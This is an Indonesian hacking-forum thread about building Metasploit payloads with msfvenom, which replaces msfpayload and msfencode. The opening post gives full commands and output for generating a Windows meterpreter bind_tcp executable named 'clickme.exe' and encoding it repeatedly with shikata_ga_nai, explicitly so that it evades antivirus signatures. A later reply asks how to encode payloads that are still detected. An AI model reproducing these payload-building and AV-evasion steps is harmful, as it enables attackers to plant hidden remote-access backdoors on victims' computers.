[Share] New msfvenom KaliLinux 2.- = msfpayload+msfencode
#1
Metasploit Framework: ‘msfvenom’
Shared Posted dari web tetangga Smile "jika sudah ada silhkan di hpus... silahkan cek di halaman    

Sekedar mengingatkan fungsi ‘msfpayload’ adalah seperti berikut:
1. 1 msfpayload ( Versi sebelumnya )



Quote:root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp X > /tmp/clickme.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 298
Options: {}

Command diatas akan menghasilkan file binary windows executable (exe). Payload file tersebut adalah sebuah meterpreter metasploit yang akan terhubung ke attacker menggunakan bind TCP. Karena LPORT tidak saya definisikan di sana, jadi LPORT default adalah port 4444. Jadilah file ini, kemudian coba di klik… hyahh.. ada warning antivirus


Virus Warning
Untuk itulah digunakan msfencode yang akan melakukan encode byte demi byte payload sehingga diharapkan bisa mengecoh signature antivirus

1.2 msfencode ( Versi sebelumnya )
Command untuk meng-encode payload dan keluarannya di /tmp/clickme.exe

Quote:root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /tmp/clickme.exe


[*]x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*]x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*]x86/shikata_ga_nai succeeded with size 379 (iteration=3)
[*]x86/shikata_ga_nai succeeded with size 406 (iteration=4)
[*]x86/shikata_ga_nai succeeded with size 433 (iteration=5)
[*]x86/shikata_ga_nai succeeded with size 460 (iteration=6)
[*]x86/shikata_ga_nai succeeded with size 487 (iteration=7)
[*]x86/shikata_ga_nai succeeded with size 514 (iteration=8)
[*]x86/shikata_ga_nai succeeded with size 541 (iteration=9)
[*]x86/shikata_ga_nai succeeded with size 568 (iteration=10)


Proses encode menggunakan tipe x86/shikata_ga_nai dengan iterasi sebanyak 10 kali encode.





Sedangkan jika menggunakan command msfvenom, cukup satu perintah saja (perhatikan, perintah di atas ‘kan dua perintah yang dipisah ‘pipe’ atau tanda | ) tapi ‘msfvenom’ hanya seperti ini:


[*]

2.0 msfvenom ( Versi Kali linux 2.-)


Quote:
./msfvenom -p windows/meterpreter/bind_tcp -f exe -e -i 3 -s 480 RHOST=10.5.253.213 >> /tmp/clickme.exe



selesai


#maaf jika kurng jelas "post 1
Quote:
root@admin :~#exploit~firewall~defensif
BELAJAR UNTUK BERBAGI >

#2
terimakasih thread nya, intinya sekaran msfpayload udah ngga ada lagi. sekarang pake msfvenom, dan gunakan msfvenom -h dan lihat semua commands nya. untuk melihat semua payload bisa dengan mengetikkan command msfvenom -p
Quote:~ Tan Hana Wighna Tan Sirna ~

#3
hehe bener sekali sob....untuk kali sudah di upgrade ke msfvenom Smile
msfvenom = msfpayload+msfencode
Quote:
root@admin :~#exploit~firewall~defensif
BELAJAR UNTUK BERBAGI >

#4
Ane mau nanya di thread ane sob Big Grin berdasarkan referensi disini


ane udah bikin payloadnya dg msfvenom tapi msh trdeteksi AV ,trus berdsrkan sumber diatas ane"cmiww katanya di encode lagi (Kali linux 1.0) ...so
cara encode file .exe  di Kali linux 2.0 gimana ya sob ? 

#Terima kasih...
Quote:
root@admin :~#exploit~firewall~defensif
BELAJAR UNTUK BERBAGI >






Users browsing this thread: 1 Guest(s)